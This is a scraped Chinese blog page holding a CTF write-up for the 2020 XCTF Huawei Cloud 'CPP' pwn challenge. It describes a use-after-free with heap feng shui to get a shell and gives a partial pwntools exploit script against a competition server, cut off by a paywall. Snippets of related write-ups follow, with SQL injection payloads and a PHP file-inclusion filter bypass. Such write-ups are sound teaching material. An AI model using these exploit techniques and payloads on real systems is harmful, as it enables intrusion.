2020XCTF华为云专场pwn题WP

最新推荐文章于 2024-05-22 16:14:45 发布
最新推荐文章于 2024-05-22 16:14:45 发布
阅读量576 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: PWN学习篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ConlinderFeng/article/details/111593277

Pwn

参考链接:
https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&mid=2247485829&idx=1&sn=ec7d3c78168ecd093f0ccedbc8fd4901&chksm=fd711cc8ca0695de6f63db3b6e3d5b290260d8180eda01d7bbfdab86e2f076c584c839d213b7&mpshare=1&scene=23&srcid=1224a0tfkHTtf5fzAVGCTe8s&sharer_sharetime=1608779021772&sharer_shareid=888cf94faf48c07e7e4b7637406c0216#rd

CPP

解题思路
题⽬存在uaf,结合堆⻛⽔getshell

#!/usr/bin/python
#coding:utf-8
from pwn import *
context.log_level='debug'
#io=process("./chall",env={
   
   "LD_PRELOAD":"./libc-2.31.so"})
io=remote('124.70.12.210', 10002)
libc=ELF("./libc-2.31.so")
sla=lambda a : io.sendlineafter(">",str(a))
ia =lambda  : io.interactive()
def add(idx):
	sla(0)#choice
	sla("/bin/sh")
	sla(i)#index
def dele(idx,ct='a'):
	sla(1)#choice
	sla(idx)
	sla(ct)#index
#gdb.attach(io,'b *{}+0x0000555555554000'.format(0x13dd))
for i in range(0x420/0x20+2):
	add(i)
add(2)
sla(1)#choice
sla(1)
heap_base=u64(io.recvuntil("\x0a")[-7:-1].ljust(8,'\x00'))-0x470+0x20
log
最低0.47元/天 解锁文章

200万优质内容无限畅学
2020-12-20 xctf记录
G0t1t的博客
12-20 275
sqli 1 and 1=1 1 and 1=2 正常且有回显 说明存在注入 1’ 报错 说明为字符型注入 1’# 正常且有回显 说明为单引号闭合 1’ order by 1# 正常且有回显 1’ order by 2# 正常且有回显 1’ order by 3# 报错 说明注入点在2,有两列 于是union查询 ’ and 1=2 union select 1,2,database()# 触发了过滤原则 select被ban掉了 思路受阻 参考wp发现这个考查了堆叠注入 于是查看所有的表名 1
2020XCTF/华为杯】PYPY WriteUp
古月浪子的博客
12-24 784
目是一个PYPY打包的elf程序,使用pygame写了一个贪吃蛇游戏,现有的pyinstaller的解包脚本好像不太好使,那么自己动手 根据输出报错信息定位代码,这个qword_6077E0应该是反序列化pyc代码的函数,gdb断在这里,即可拿到对应的pyc文件 这个函数会被执行4次,第4次是我们期望的代码,第四次断下后使用 dump memory ./dmp $rdi $rdi+$rsi 拿到文件,补上前4个字节的文件头以后,加上.pyc后缀然后使用uncompyle6反编译,得到源码 DEFAULT
php aes srand,【wp2020XCTF_逆向
weixin_30691649的博客
03-11 446
前几天的XCTF最后一场终于打完了,三场比赛下来对逆向部分的大概感觉是从第一场的啥都不会做(一道lua+一道apk)到后来的终于能有参与度,至少后两场的目都是pc逆向,虽然特殊架构但好歹能做(tcl。本文是三场XCTF所有逆向目的wp+复现整理。赛中拿到了7/10的flag,很多是跟着队里的大佬做出来的(tqltql),这边就试着独立复现一下,至少打完应该长长记性(P.S. 不会的暂时标了【...
XCTF高校络安全专挑战赛 |华为云专场重磅开启!
Cyberpeace的博客
12-17 683
络空间的竞争,归根结底是人才的竞争。数字化转型大潮之下,络与物理空间的边界日渐消融,越来越专业化、规模化的黑客组织攻击带来新的挑战,络攻防态势也愈演愈烈。基于此,XCTF高校络安全专挑战赛吹响集结号。 XCTF高校络安全专挑战赛由XCTF国际联赛主办,赛宁安承办,华为终端安全、华为云安全、华为鲲鹏计算安全独家赞助。大赛共设“HarmonyOS和HMS”、“华为云”、“鲲鹏计算”三场专场选拔赛及总决赛,面向全体高校在校生开启,并提供35万元专项奖励基金供选手挑战,赛事优胜者除了获得华为盖章认
2020 华为xctf第二场
Firebasky的博客
12-24 718
第二次就做了一个web,web3是看三之师傅的wp复现的。 如果wp有错误希望师傅们指出 链接:https://pan.baidu.com/s/16BhdYDuD7yR-eBH-zgbsow 提取码:t2rl 复制这段内容后打开百度盘手机App,操作更方便哦
XCTF 华为云专场 fastexec
yongbaoii的博客
01-26 336
绿 缺个库 sudo apt-get install libjpeg62 分析一下qemu文件 拿到id 注册了个mmio 可以看一下结构体 fastexec_mmio_read 逻辑非常简单 就是将四个成员依次输出 fastexec_mmio_write 有一次任意写机会。 怎么攻击呢?首先看了官方给的思路 用到了TCG模块攻击 什么是TCG模块? 我们一张图就明白了 图是上找的 从QEMU-0.10.0开始,TCG成为QEMU新的翻译引擎,使QEMU不再依赖于GCC3.X版本,并且做到.
华为云xctf_2020资格赛CTF解指南
资源摘要信息:"xctf_huaweicloud-qualifier-2020" 1. 概述 "xctf_huaweicloud-qualifier-2020" 是一场信息安全竞赛,通常称为CTF(Capture The Flag)比赛,其目的在于检验和提高参赛者的信息安全技能。这类比赛...
络安全 XCTF】simple_transfer_└─$ sudo apt-get install foremost reading package (1)
2401_84968557的博客
05-13 391
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上络安全知识点!真正的体系化!
络安全与黑客技术学习资源汇总---2020.08更新
第七宇林的博客
08-15 1937
络安全与黑客技术学习资源汇总:漏洞测试学习平台、安全资讯平台、安全行业协会/组织、POC(验证性测试)提交 学习、黑客技术与络安全书籍、CTF练习平台、SRC(安全响应中心)平台、安全技术博客。
XCTF web进阶区wp(二)
0xdawn的博客
03-04 528
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr(...
Zeratool:自动利用漏洞利用(AEG)和远程标志捕获来解决可利用的CTF问
04-29
Zeratool 自动利用漏洞利用(AEG)和远程标志捕获来解决可利用的CTF问 该工具使用通过挂接printf并查找来协整地分析二进制文件。 然后,这些程序状态通过和一系列脚本技巧被武器化以用于远程代码执行。 最后,在本地对有效负载进行测试,然后将其提交给远程CTF服务器以恢复该标志。 正在安装 Zeratool已在Ubuntu 16.04上进行了测试,并且已将安装脚本从Ubuntu 12.04设置为Ubuntu 18.04。 ./install.sh 用法 Zeratool是一个python脚本,它接受二进制文件作为参数,还可以选择链接的libc库,以及CTF Server连接信息 [chris:~/Zeratool] [angr] python zeratool.py -h usage: zeratool.py [-h] [-l LIBC] [-u URL] [-p PORT]
Nctf2019 pwn
doudoudedi
11-24 738
没啥好说的自己菜 就做了三个 hello_pwn 没啥好说了直接连 from pwn import * local=1 p=remote('139.129.76.65',50003) p.interactive() pwn me 100 years! (Ⅰ) 00截断然后直接覆盖 from pwn import * p=remote('139.129.76.65',50004) #p=proce...
XCTF pwn1 babystack
最新发布
zwb2603096342的博客
05-22 830
攻防世界 pwn1 babystack canary的泄露和onegadget的泄露
CTF中的AEG(五) 2021 华为云专场 pwn_game
yongbaoii的博客
04-09 759
华为云专场质量还是很高的 很多虚拟化类型的目学到很多 这个是为数不多的不是虚拟化的
CTF中的AEG(七) 对aeg目源码分析 华为云专场-pwn_game
yongbaoii的博客
04-18 607
想起来就发点
xctf pwn1
qq_41071646的博客
05-14 1034
这个目我不知道为什么在址上面没有打通 我只能在本机上玩了 本机的库是 2.23 所以我也按照 2.23来打了 然后这个 可以用system 也可以用 one_gadget 用的是 one_gadget 然后说一下这个 看起来 就是一个简单的 x64的栈溢出 然后我们看一下保护 这里面 有一个 canary 需要绕过的 其实看ida 也能看出来 v6就是我...
noxCTF-pwn1-格式化字符串
Peanuts
09-09 639
格式化字符串 额额博客爆炸。。之前写的都没了懒得再写一遍了太坑了这博客就发个wp吧,过程就是远程泄漏ret地址,因为没有开alsr from pwn import * context.log_level='debug' elf = ELF('./believeMe.dms') libc = elf.libc p = remote('18.223.228.52',13337) #p = pr...
XCTF pwn部分解记录
windy_ll的博客
02-13 3144
一、前言     闲来无事,刷刷ctf(PS:傻逼优快云,标不能包含新手二字) 二、目: level0     1、下载好目后,拖入到kali中去,用file和checksec查看一下,可以发现该程序是64位,只开了NX保护,如下图所示:     2、拖入到IDA中去,发现在main函数中打印出信息后就调用了vulnerable_function函数,跟进vulnerable_function函数,可以发现read函数处为栈溢出漏洞,并且可以得知该buf数组距离ebp为0x80个字节,如下图所
漏洞挖掘 符号执行_初探利用angr进行漏洞挖掘(上)
weixin_39943678的博客
12-15 2008
前言angr是一个基于python开发的一款符号执行工具,可以用于二进制分析,在CTF逆向中有很大的用途,例如可以通过约束求解找到复杂计算的正确解,从而拿到flag;然而angr的用途远不止于此,它甚至还能被用于AEG (Automatic Exploit Generation) ,有一个叫zeratool的工具实现了一些用于简单的pwn的AEG,AEG的步骤一般分为:挖掘漏洞生成利用exp验证e...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

叶叶扁舟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值